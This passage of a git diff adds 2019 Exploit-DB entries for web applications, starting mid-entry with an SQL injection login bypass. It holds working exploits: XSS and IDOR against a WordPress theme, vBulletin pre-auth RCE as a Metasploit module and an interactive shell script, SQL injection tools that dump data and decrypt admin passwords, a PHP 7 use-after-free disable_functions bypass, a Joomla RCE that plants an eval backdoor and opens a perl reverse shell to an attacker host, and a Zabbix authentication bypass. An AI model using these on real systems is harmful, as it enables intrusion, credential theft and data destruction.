+Content-Disposition: form-data; name="csrfmiddlewaretoken" 
+lZVnIo12dzwRuJbCXjjr7cVAQKa4qwhBwdk85Uq4aHpWdqtNTP2rCZB8pmU1uQjj 
+-----------------------------54363239114604 
+Content-Disposition: form-data; name="username" 
+' or '1=1 
+-----------------------------54363239114604-- 
+
+HTTP/1.1 200 OK 
+Date: Thu, 26 Sep 2019 12:40:24 GMT 
+Server: WSGIServer/0.2 CPython/3.5.3 
+Content-Type: text/html; charset=utf-8 
+X-Frame-Options: SAMEORIGIN 
+Content-Length: 34 
+User:('test', '1234', 'test@test')
\ No newline at end of file
diff --git a/exploits/php/webapps/47436.txt b/exploits/php/webapps/47436.txt
new file mode 100644
index 000000000..81564d32a
--- /dev/null
+++ b/exploits/php/webapps/47436.txt
@@ -0,0 +1,44 @@
+# Exploit Title: WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting
+# Google Dork: inurl:/wp-content/themes/zoner/
+# Date: 2019-09-24
+# Exploit Author: m0ze
+# Vendor Homepage: https://fruitfulcode.com/
+# Software Link: https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226
+# Version: 4.1.1
+# Tested on: Parrot OS
+
+
+----[]- Persistent XSS: -[]----
+Create a new agent account, log in and press the blue «Plus» button under
+the main menu («Add Your Property» text will pop-up on hover) - you will be
+redirected to https://zoner.demo-website.com/?add-property=XXXX page. Use
+your payload inside «Address» input field («Local information» block),
+press on the «Create Property» button and check your payload on the
+https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties
+page. Your new property must be approved by admin, so this is a good point
+to steal some cookies :)
+
+Payload Sample: "><img src=x onerror=alert('Greetings from m0ze')>
+
+PoC: log in as agentm0ze:WhgZbOUH (login/password) and go to the
+https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties
+page.
+
+
+----[]- IDOR: -[]----
+Create a new agent account, log in and create a new property. Then go to
+the
+https://zoner.fruitfulcode.com/author/aaaagent/?profile-page=my_properties
+page and pay attention to the trash icon under your property info. Open the
+developers console and check out this code: <a title="Delete Property"
+href="#" data-toggle="modal" class="delete-property"
+data-propertyid="XXX"><i class="delete fa fa-trash-o"></i></a>. Edit the
+data-propertyid="XXX" attribute by typing instead of XXX desired post or
+page ID which you want to delete (you can get post/page ID on the <body>
+tag class -> postid-494, so attribute for post with ID 494 will be
+data-propertyid="494"). After you edit the ID, click on the trash icon and
+confirm deletion (POST
+https://zoner.fruitfulcode.com/wp-admin/admin-ajax.php?action=delete_property_act&property_id=494&security=1304db23f0).
+Funny fact that you can delete ANY post & page (!) you want, security key
+is not unique for each requests so it's possible to erase all pages and
+posts within a few minutes.
\ No newline at end of file
diff --git a/exploits/php/webapps/47437.rb b/exploits/php/webapps/47437.rb
new file mode 100755
index 000000000..7a63b858a
--- /dev/null
+++ b/exploits/php/webapps/47437.rb
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+ super(update_info(info,
+                   'Name'           => 'vBulletin 5.x 0day pre-quth RCE exploit',
+      'Description'    => %q{
+        vBulletin 5.x 0day pre-auth RCE exploit.
+        This should work on all versions from 5.0.0 till 5.5.4
+      },
+      'Platform'       => 'php',
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Reported by: anonymous',  # reported by
+          'Original exploit by: anonymous',  # original exploit
+          'Metasploit mod by: r00tpgp',  # metasploit module
+      ],
+      'Payload'        =>
+        {
+          'BadChars'    => "\x22",
+        },
+      'References'     =>
+        [
+          ['CVE', 'CVE-2019-16759'],
+          ['EDB', 'NA'],
+          ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']
+        ],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [
+          [ 'Automatic Targeting', { 'auto' => true }  ],
+      #    ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
+      #    ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
+      ],
+      'DisclosureDate' => 'Sep 23 2019',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+        ])
+
+  end
+
+    def check
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),
+      'encode_params' => false,
+      'vars_post'     => 
+      {
+        'widgetConfig[code]'  => "echo shell_exec(\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\');exit;",
+      }
+     })
+
+     if res && res.body && res.body.include?('h4x0000r4l1f4')
+       return Exploit::CheckCode::Vulnerable
+     end
+
+     Exploit::CheckCode::Safe
+  end
+
+    def exploit
+      print_status("Sending payload.....")
+      resp = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),
+      'encode_params' => false,
+      'vars_post'     =>
+      {
+        #'widgetConfig[code]'  => "echo " + payload.encoded + "exit;",
+	 'widgetConfig[code]'  => payload.encoded,
+      }
+     })
+      #unless resp and resp.code == 200
+      # fail_with(Failure::Unknown, "Exploit failed.")
+      #end
+
+      #print_good("Success!")
+      #print_line(resp.body)
+
+   end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47438.txt b/exploits/php/webapps/47438.txt
new file mode 100644
index 000000000..20c941d8b
--- /dev/null
+++ b/exploits/php/webapps/47438.txt
@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+# Exploit Title: phpIPAM Custom Field Filter SQL Injection
+# Exploit Announcement Date: September 16, 2019 5:18 AM
+# Exploit Creation Date: September 27, 2019
+# Exploit Author: Kevin Kirsche
+# Vendor Homepage: https://phpipam.net
+# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
+# Version: 1.4
+# Tested on: Ubuntu 18.04 / MariaDB 10.4
+# Requires:
+#   Python 3
+#   requests package
+# CVE: CVE-2019-16692
+
+# For more details, view:
+# https://github.com/phpipam/phpipam/issues/2738
+# https://github.com/kkirsche/CVE-2019-16692
+
+# Example Output
+# [+] Executing select user()
+# [*] Received: phpipam@172.18.0.4
+# [+] Executing select system_user()
+# [*] Received: phpipam@172.18.0.4
+# [+] Executing select @@version
+# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
+# [+] Executing select @@datadir
+# [*] Received: /var/lib/mysq
+# [+] Executing select @@hostname
+# [*] Received: ubuntu
+
+
+from requests import Session
+
+host = "localhost"
+login_url = f"http://{host}/app/login/login_check.php"
+exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"
+
+credentials = {
+    "ipamusername": "Admin",
+    "ipampassword": "Password",
+}
+
+payload = {
+    "action": "add",
+    "table": "",
+}
+
+
+cmds = {
+    "unpriv": [
+        "select user()",
+        "select system_user()",
+        "select @@version",
+        "select @@datadir",
+        "select @@hostname",
+    ]
+}
+
+if __name__ == "__main__":
+    client = Session()
+    resp = client.post(login_url, data=credentials)
+    if resp.status_code == 200:
+        for cmd in cmds["unpriv"]:
+            print(f"[+] Executing {cmd}")
+            payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
+            resp = client.post(exploit_url, data=payload)
+            info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>")
+            print(f"[*] Received: {info}")
\ No newline at end of file
diff --git a/exploits/php/webapps/47447.py b/exploits/php/webapps/47447.py
new file mode 100755
index 000000000..106621380
--- /dev/null
+++ b/exploits/php/webapps/47447.py
@@ -0,0 +1,31 @@
+#!/usr/bin/python
+#
+# vBulletin 5.x 0day pre-auth RCE exploit
+# 
+# This should work on all versions from 5.0.0 till 5.5.4
+#
+# Google Dorks:
+# - site:*.vbulletin.net
+# - "Powered by vBulletin Version 5.5.4"
+
+import requests
+import sys
+
+if len(sys.argv) != 2:
+    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
+
+params = {"routestring":"ajax/render/widget_php"}
+
+while True:
+     try:
+          cmd = raw_input("vBulletin$ ")
+          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
+          r = requests.post(url = sys.argv[1], data = params)
+          if r.status_code == 200:
+               print r.text
+          else:
+               sys.exit("Exploit failed! :(")
+     except KeyboardInterrupt:
+          sys.exit("\nClosing shell...")
+     except Exception, e:
+          sys.exit(str(e))
\ No newline at end of file
diff --git a/exploits/php/webapps/47455.php b/exploits/php/webapps/47455.php
new file mode 100644
index 000000000..9d77ffb9d
--- /dev/null
+++ b/exploits/php/webapps/47455.php
@@ -0,0 +1,73 @@
+#!/usr/bin/php
+
+/*
+# Exploit Title: Detrix EDMS cleartext user password remote SQLI exploit
+
+# Google Dork:
+# Date: Jul 2019
+# Exploit Author: Burov Konstantin
+# Vendor Homepage: forum.detrix.kz
+# Software Link:
+https://www.documentov.com/index.php?route=document/search&search=1.2.3.1505.zip&page=1&limit=20&document_uid=3d7bae5a-c2e5-11e8-9ed8-b7ed7eb0f5bb
+# Version: any
+# Tested on: Detrix 1.2.3.1505
+*/
+
+<?php
+
+/*---------------------------CHANGE-ME--------------------------------*/
+
+$URL = "http://192.168.56.6"; // Set URL for the target host
+$user_id = 0; // 0 - Default admin ID
+
+/*--------------------------------------------------------------------*/
+
+$banner = "Exploiting SQLi vuln and password decrypting for Detrix\n".
+	"http://forum.detrix.kz\nhttps://github.com/sadshade/Detrix-Passwords-PoC \n".
+	"sad.2.shade@mail.com, 2019.\n\n";
+
+// SQLi request
+$sql_req =
+	"login' AND 99=CAST('a__'||(SELECT COALESCE(CAST(password AS ".
+	"CHARACTER(10000)),(CHR(32))) FROM manuscript.ref_system_users OR".
+	"DER BY id OFFSET " . $user_id . " LIMIT 1)::text||'__a' ".
+	"AS NUMERIC) AND 'a'='a";
+
+$data = array('password' => 'pass',
+	'login' => $sql_req);
+
+$options = array(
+    'http' => array(
+        'header' => "Content-type: application/x-www-form-urlencoded\r\n",
+        'method' => 'POST',
+        'content' => http_build_query($data)
+    )
+);
+
+// Key from %detrix%/system/utils/MSF_string.php
+$sSuperDuperSecretKey =
+	"!-eeflslskdjfla;456864~}{fjkdlswkfkll@#$%#$9f0sf8a723#@";
+
+echo $banner;
+
+try {
+	$context  = stream_context_create($options);
+	echo "Send SQLi to $URL...\n";
+	$result = file_get_contents($URL, false, $context);
+} catch (Exception $e) {
+    echo 'Error: ',  $e->getMessage(), "\n";
+}
+
+if ($result != "") {
+	if (preg_match("/\"a__(.+)__a\"/", $result, $encrypted_pass) == 1) {
+
+		$clear_pass = trim(
+			openssl_decrypt(base64_decode($encrypted_pass[1]),
+			"BF-ECB", $sSuperDuperSecretKey,
+			OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING)
+		); // Decrypt pass
+		echo "Pass for User id $user_id: $clear_pass \n";
+	} else echo "Error: no such User id:$user_id or empty password!\n";
+} else echo "Error: empty Response or error!\n"
+
+?>
\ No newline at end of file
diff --git a/exploits/php/webapps/47460.txt b/exploits/php/webapps/47460.txt
new file mode 100644
index 000000000..96370e85b
--- /dev/null
+++ b/exploits/php/webapps/47460.txt
@@ -0,0 +1,60 @@
+# Exploit Title: LabCollector (Laboratory Information System) 5.423 - Multiples SQL Injection
+# Date: 09/09/2019
+# Software Links/Project: https://www.labcollector.com/clientarea/downloads.php
+# Version: LabCollector (Laboratory Information System) 5.423
+# Exploit Author: Carlos Avila
+# Category: webapps
+# Tested on: Debian 9 / Win10
+# Contact: http://twitter.com/badboy_nt
+
+1. Description
+  
+LabCollector Lab Services Manager (LSM) is a network based application that helps laboratories, core facilities, biotechs providing services to clients or partners to keep track of samples arriving for processing, track status and generate reports. Billing management is also possible. LSM is a simple and complete lab services LIMS software. Totally configurable by the user, it can be adapted to any situation. 
+
+This allows unauthenticated remote attacker to execute arbitrary SQL commands and obtain private information. Admin or users valid credentials aren't required. In a deeper analysis other pages are also affected with the vulnerability over others inputs.
+
+It written in PHP it is vulnerable to SQL Injection on multiples occurrences. The parameters affected are detailed below:
+
+http://192.168.0.102/labcollector/html/login.php [parameters affected via POST method: login]
+http://192.168.0.102/labcollector/html/retrieve_password.php (parameters affected via POST method: user_name)
+
+
+
+2. Proof of Concept
+
+
+----------------------------------------------------------------------------------------------------------------------------------
+Post Request:
+
+POST /labcollector/html/login.php HTTP/1.1
+Host: 192.168.0.102
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 113
+DNT: 1
+Connection: close
+Referer: http://192.168.0.102/labcollector/html/login.php
+Cookie: PHPSESSID=cio2kpq89f4da0b1fhakfn68k7
+Upgrade-Insecure-Requests: 1
+
+login=test&pass=hola&action=login&Submit=Sign+In
+
+----------------------------------------------------------------------------------------------------------------------------------
+
+All tests have been performed in a controlled and local environment.
+
+sunday:sqlmap badboy_nt$ python sqlmap.py -r SQLI-LabCollectorLogin --random-agent --tamper randomcase -p login --dbms mysql --dbs
+
+
+
+
+sunday:sqlmap badboy_nt$ python sqlmap.py -r SQLI-LabCollectorLogin2 --random-agent --tamper randomcase -p user_name --dbms mysql -f
+
+
+
+3. Solution:
+
+Application inputs must be validated correctly throughout the development of the project.
\ No newline at end of file
diff --git a/exploits/php/webapps/47462.php b/exploits/php/webapps/47462.php
new file mode 100644
index 000000000..b356736bb
--- /dev/null
+++ b/exploits/php/webapps/47462.php
@@ -0,0 +1,221 @@
+<?php
+
+# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
+#
+# Bug: https://bugs.php.net/bug.php?id=72530
+#
+# This exploit should work on all PHP 7.0-7.3 versions
+# released as of 04/10/2019, specifically:
+# 
+# PHP 7.0 - 7.0.33
+# PHP 7.1 - 7.1.31
+# PHP 7.2 - 7.2.23
+# PHP 7.3 - 7.3.10
+#
+# Author: https://github.com/mm0r1
+
+pwn("uname -a");
+
+function pwn($cmd) {
+    global $abc, $helper;
+
+    function str2ptr(&$str, $p = 0, $s = 8) {
+        $address = 0;
+        for($j = $s-1; $j >= 0; $j--) {
+            $address <<= 8;
+            $address |= ord($str[$p+$j]);
+        }
+        return $address;
+    }
+
+    function ptr2str($ptr, $m = 8) {
+        $out = "";
+        for ($i=0; $i < $m; $i++) {
+            $out .= chr($ptr & 0xff);
+            $ptr >>= 8;
+        }
+        return $out;
+    }
+
+    function write(&$str, $p, $v, $n = 8) {
+        $i = 0;
+        for($i = 0; $i < $n; $i++) {
+            $str[$p + $i] = chr($v & 0xff);
+            $v >>= 8;
+        }
+    }
+
+    function leak($addr, $p = 0, $s = 8) {
+        global $abc, $helper;
+        write($abc, 0x68, $addr + $p - 0x10);
+        $leak = strlen($helper->a);
+        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
+        return $leak;
+    }
+
+    function parse_elf($base) {
+        $e_type = leak($base, 0x10, 2);
+
+        $e_phoff = leak($base, 0x20);
+        $e_phentsize = leak($base, 0x36, 2);
+        $e_phnum = leak($base, 0x38, 2);
+
+        for($i = 0; $i < $e_phnum; $i++) {
+            $header = $base + $e_phoff + $i * $e_phentsize;
+            $p_type  = leak($header, 0, 4);
+            $p_flags = leak($header, 4, 4);
+            $p_vaddr = leak($header, 0x10);
+            $p_memsz = leak($header, 0x28);
+
+            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
+                # handle pie
+                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
+                $data_size = $p_memsz;
+            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
+                $text_size = $p_memsz;
+            }
+        }
+
+        if(!$data_addr || !$text_size || !$data_size)
+            return false;
+
+        return [$data_addr, $text_size, $data_size];
+    }
+
+    function get_basic_funcs($base, $elf) {
+        list($data_addr, $text_size, $data_size) = $elf;
+        for($i = 0; $i < $data_size / 8; $i++) {
+            $leak = leak($data_addr, $i * 8);
+            if($leak - $base > 0 && $leak - $base < $text_size) {
+                $deref = leak($leak);
+                # 'constant' constant check
+                if($deref != 0x746e6174736e6f63)
+                    continue;
+            } else continue;
+
+            $leak = leak($data_addr, ($i + 4) * 8);
+            if($leak - $base > 0 && $leak - $base < $text_size) {
+                $deref = leak($leak);
+                # 'bin2hex' constant check
+                if($deref != 0x786568326e6962)
+                    continue;
+            } else continue;
+
+            return $data_addr + $i * 8;
+        }
+    }
+
+    function get_binary_base($binary_leak) {
+        $base = 0;
+        $start = $binary_leak & 0xfffffffffffff000;
+        for($i = 0; $i < 0x1000; $i++) {
+            $addr = $start - 0x1000 * $i;
+            $leak = leak($addr, 0, 7);
+            if($leak == 0x10102464c457f) { # ELF header
+                return $addr;
+            }
+        }
+    }
+
+    function get_system($basic_funcs) {
+        $addr = $basic_funcs;
+        do {
+            $f_entry = leak($addr);
+            $f_name = leak($f_entry, 0, 6);
+
+            if($f_name == 0x6d6574737973) { # system
+                return leak($addr + 8);
+            }
+            $addr += 0x20;
+        } while($f_entry != 0);
+        return false;
+    }
+
+    class ryat {
+        var $ryat;
+        var $chtg;
+        
+        function __destruct()
+        {
+            $this->chtg = $this->ryat;
+            $this->ryat = 1;
+        }
+    }
+
+    class Helper {
+        public $a, $b, $c, $d;
+    }
+
+    if(stristr(PHP_OS, 'WIN')) {
+        die('This PoC is for *nix systems only.');
+    }
+
+    $n_alloc = 10; # increase this value if you get segfaults
+
+    $contiguous = [];
+    for($i = 0; $i < $n_alloc; $i++)
+        $contiguous[] = str_repeat('A', 79);
+
+    $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
+    $out = unserialize($poc);
+    gc_collect_cycles();
+
+    $v = [];
+    $v[0] = ptr2str(0, 79);
+    unset($v);
+    $abc = $out[2][0];
+
+    $helper = new Helper;
+    $helper->b = function ($x) { };
+
+    if(strlen($abc) == 79) {
+        die("UAF failed");
+    }
+
+    # leaks
+    $closure_handlers = str2ptr($abc, 0);
+    $php_heap = str2ptr($abc, 0x58);
+    $abc_addr = $php_heap - 0xc8;
+
+    # fake value
+    write($abc, 0x60, 2);
+    write($abc, 0x70, 6);
+
+    # fake reference
+    write($abc, 0x10, $abc_addr + 0x60);
+    write($abc, 0x18, 0xa);
+
+    $closure_obj = str2ptr($abc, 0x20);
+
+    $binary_leak = leak($closure_handlers, 8);
+    if(!($base = get_binary_base($binary_leak))) {
+        die("Couldn't determine binary base address");
+    }
+
+    if(!($elf = parse_elf($base))) {
+        die("Couldn't parse ELF header");
+    }
+
+    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
+        die("Couldn't get basic_functions address");
+    }
+
+    if(!($zif_system = get_system($basic_funcs))) {
+        die("Couldn't get zif_system address");
+    }
+
+    # fake closure object
+    $fake_obj_offset = 0xd0;
+    for($i = 0; $i < 0x110; $i += 8) {
+        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
+    }
+
+    # pwn
+    write($abc, 0x20, $abc_addr + $fake_obj_offset);
+    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
+    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
+
+    ($helper->b)($cmd);
+
+    exit();
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/47465.py b/exploits/php/webapps/47465.py
new file mode 100755
index 000000000..58f60edb7
--- /dev/null
+++ b/exploits/php/webapps/47465.py
@@ -0,0 +1,182 @@
+# Exploit Title: Joomla 3.4.6 - 'configuration.php' Remote Code Execution
+# Google Dork: N/A
+# Date: 2019-10-02
+# Exploit Author: Alessandro Groppo @Hacktive Security
+# Vendor Homepage: https//www.joomla.it/
+# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
+# Version: 3.0.0 --> 3.4.6
+# Tested on: Linux
+# CVE : N/A
+#
+# Technical details: https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
+# Github: https://github.com/kiks7/rusty_joomla_rce
+#
+# The exploitation is implanting a backdoor in /configuration.php file in the root directory 
+# with an eval in order to be more suitable for all environments, but it is also more intrusive.
+# If you don't like this way, you can replace the get_backdoor_pay() 
+# with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /')
+
+#!/usr/bin/env python3
+
+import requests
+from bs4 import BeautifulSoup
+import sys
+import string
+import random
+import argparse
+from termcolor import colored
+
+PROXS = {'http':'127.0.0.1:8080'}
+PROXS = {}
+
+def random_string(stringLength):
+	letters = string.ascii_lowercase
+	return ''.join(random.choice(letters) for i in range(stringLength))
+
+
+backdoor_param = random_string(50)
+
+def print_info(str):
+	print(colored("[*] " + str,"cyan"))
+
+def print_ok(str):
+	print(colored("[+] "+ str,"green"))
+
+def print_error(str):
+	print(colored("[-] "+ str,"red"))
+
+def print_warning(str):
+	print(colored("[!!] " + str,"yellow"))
+
+def get_token(url, cook):
+	token = ''
+	resp = requests.get(url, cookies=cook, proxies = PROXS)
+	html = BeautifulSoup(resp.text,'html.parser')
+	# csrf token is the last input
+	for v in html.find_all('input'):
+		csrf = v
+	csrf = csrf.get('name')
+	return csrf
+
+
+def get_error(url, cook):
+	resp = requests.get(url, cookies = cook, proxies = PROXS)
+	if 'Failed to decode session object' in resp.text:
+		#print(resp.text)
+		return False
+	#print(resp.text)
+	return True
+
+
+def get_cook(url):
+	resp = requests.get(url, proxies=PROXS)
+	#print(resp.cookies)
+	return resp.cookies
+
+
+def gen_pay(function, command):
+	# Generate the payload for call_user_func('FUNCTION','COMMAND')
+	template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
+	#payload =  command + ' || $a=\'http://wtf\';'
+	payload =  'http://l4m3rz.l337/;' + command
+	# Following payload will append an eval() at the enabled of the configuration file
+	#payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
+	function_len = len(function)
+	final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
+	return final
+
+def make_req(url , object_payload):
+	# just make a req with object
+	print_info('Getting Session Cookie ..')
+	cook = get_cook(url)
+	print_info('Getting CSRF Token ..')
+	csrf = get_token( url, cook)
+
+	user_payload = '\\0\\0\\0' * 9
+	padding = 'AAA' # It will land at this padding
+	working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
+	clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
+
+	inj_object = '";'
+	inj_object += object_payload
+	inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
+	password_payload = padding + inj_object
+	params = {
+            'username': user_payload,
+            'password': password_payload,
+            'option':'com_users',
+            'task':'user.login',
+            csrf :'1'
+            }
+
+	print_info('Sending request ..')
+	resp  = requests.post(url, proxies = PROXS, cookies = cook,data=params)
+	return resp.text
+
+def get_backdoor_pay():
+	# This payload will backdoor the the configuration .PHP with an eval on POST request
+
+	function = 'assert'
+	template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
+	# payload =  command + ' || $a=\'http://wtf\';'
+	# Following payload will append an eval() at the enabled of the configuration file
+	payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
+	function_len = len(function)
+	final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
+	return final
+
+def check(url):
+	check_string = random_string(20)
+	target_url = url + 'index.php/component/users'
+	html = make_req(url, gen_pay('print_r',check_string))
+	if check_string in html:
+		return True
+	else:
+		return False
+
+def ping_backdoor(url,param_name):
+	res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
+	if 'PWNED' in res.text:
+		return True
+	return False
+
+def execute_backdoor(url, payload_code):
+	# Execute PHP code from the backdoor
+	res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
+	print(res.text)
+
+def exploit(url, lhost, lport):
+	# Exploit the target
+	# Default exploitation will append en eval function at the end of the configuration.pphp
+	# as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
+	# e.g. get_payload('system','rm -rf /')
+
+	# First check that the backdoor has not been already implanted
+	target_url = url + 'index.php/component/users'
+
+	make_req(target_url, get_backdoor_pay())
+	if ping_backdoor(url, backdoor_param):
+		print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
+		print_info('Now it\'s time to reverse, trying with a system + perl')
+		execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')
+
+
+if __name__ == '__main__':
+	parser = argparse.ArgumentParser()
+	parser.add_argument('-t','--target',required=True,help='Joomla Target')
+	parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
+	parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
+	parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
+	parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
+	args = vars(parser.parse_args())
+
+	url = args['target']
+	if(check(url)):
+		print_ok('Vulnerable')
+		if args['exploit']:
+			exploit(url, args['lhost'], args['lport'])
+		else:
+			print_info('Use --exploit to exploit it')
+
+	else:
+		print_error('Seems NOT Vulnerable ;/')
\ No newline at end of file
diff --git a/exploits/php/webapps/47467.txt b/exploits/php/webapps/47467.txt
new file mode 100644
index 000000000..3dba92a69
--- /dev/null
+++ b/exploits/php/webapps/47467.txt
@@ -0,0 +1,63 @@
+# Exploit Title: Zabbix 4.2 - Authentication Bypass
+# Date: 2019-10-06
+# Exploit Author: Milad Khoshdel
+# Software Link: https://www.zabbix.com/download
+# Version: Zabbix [2.x , 3.x , 4.x] Tested on latest version Zabbix 4.2 
+# Tested on: Linux Apache/2 PHP/7.2
+# Google Dork: inurl:zabbix/zabbix.php
+
+
+
+=========
+Vulnerable Page:
+=========
+
+/zabbix.php?action=dashboard.view&dashboardid=1
+
+
+=========
+POC:
+=========
+
+Attacker can bypass login page and access to dashboard page and create [Dashboard/Report/Screen/Map] without any Username/Password and anonymously.
+All Created elements [Dashboard/Report/Screen/Map] is accessible by other users and admin.
+
+
+REGUEST -->
+
+GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1
+Host: [HOST-IP]
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+
+RESPONSE -->
+
+HTTP/1.1 200 OK
+Date: Sun, 06 Oct 2019 11:40:18 GMT
+Server: Apache/2.4.29 (Ubuntu)
+Set-Cookie: zbx_sessionid=a8d192ec833bd4476e0f6a550e6e5bed; HttpOnly
+Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+X-Frame-Options: SAMEORIGIN
+Vary: Accept-Encoding
+Content-Length: 19239
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<!DOCTYPE html>
+<html>
+
+[Dashboard Page Content Will Load Here]
+
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47469.txt b/exploits/php/webapps/47469.txt
new file mode 100644
index 000000000..0b098f98c
--- /dev/null
+++ b/exploits/php/webapps/47469.txt
